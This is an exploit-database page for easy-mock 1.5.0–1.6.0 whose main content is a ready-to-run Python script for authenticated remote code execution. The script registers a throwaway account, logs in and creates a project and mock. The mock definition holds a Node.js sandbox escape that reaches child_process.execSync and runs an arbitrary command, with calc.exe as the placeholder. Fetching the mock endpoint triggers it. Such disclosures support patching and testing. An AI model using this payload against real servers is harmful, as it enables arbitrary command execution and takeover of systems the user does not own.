Easy-Mock 1.6.0 Remote Code Execution

2021.08.14
Credit: LionTree
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated) # Date: 12/08/2021 # Exploit Author: LionTree # Vendor Homepage: https://github.com/easy-mock # Software Link: https://github.com/easy-mock/easy-mock # Version: 1.5.0-1.6.0 # Tested on: windows 10(node v8.17.0) import requests import json import random import string target = 'http://127.0.0.1:7300' username = ''.join(random.sample(string.ascii_letters + string.digits, 8)) password = ''.join(random.sample(string.ascii_letters + string.digits, 8)) print(username) print(password) # can't see the result of command cmd = 'calc.exe' # register url = target + "/api/u/register" cookies = {"SSO_LANG_V2": "EN"} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"} json_data={"name": username, "password": password} requests.post(url, headers=headers, cookies=cookies, json=json_data) # login url = target + "/api/u/login" cookies = {"SSO_LANG_V2": "EN"} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"} json_data={"name": username, "password": password} req = requests.post(url, headers=headers, cookies=cookies, json=json_data).text login = json.loads(req) token = login['data']['token'] # create project url = target + "/api/project/create" cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/new", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} json_data={"description": "just a poc", "group": "", "id": "", "members": [], "name": username, "swagger_url": "", "url": "/" + username} requests.post(url, headers=headers, cookies=cookies, json=json_data) # get project_id url = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0" cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Authorization": "Bearer " + token, "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} req = requests.get(url, headers=headers, cookies=cookies).text projects = json.loads(req) project_id = projects['data'][0]['_id'] # create mock url = target + "/api/mock/create" cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} json_data={"description": "poc", "method": "get", "mode": "{\n 'foo': 'Syntax Demo',\n 'name': function() {\n return (function() {\n TypeError.prototype.get_process = f => f.constructor(\"return process\")();\n try {\n Object.preventExtensions(Buffer.from(\"\")).a = 1;\n } catch (e) {\n return e.get_process(() => {}).mainModule.require(\"child_process\").execSync(\"" + cmd + "\").toString();\n }\n })();\n }\n}", "project_id": project_id, "url": "/" + username} requests.post(url, headers=headers, cookies=cookies, json=json_data) # preview mock url = target + "/mock/{}/{}/{}".format(project_id,username,username) cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://127.0.0.1:7300/mock/{}/{}/{}".format(project_id,username,username), "Content-Type": "application/json", "Connection": "close", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"} requests.get(url, headers=headers, cookies=cookies)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top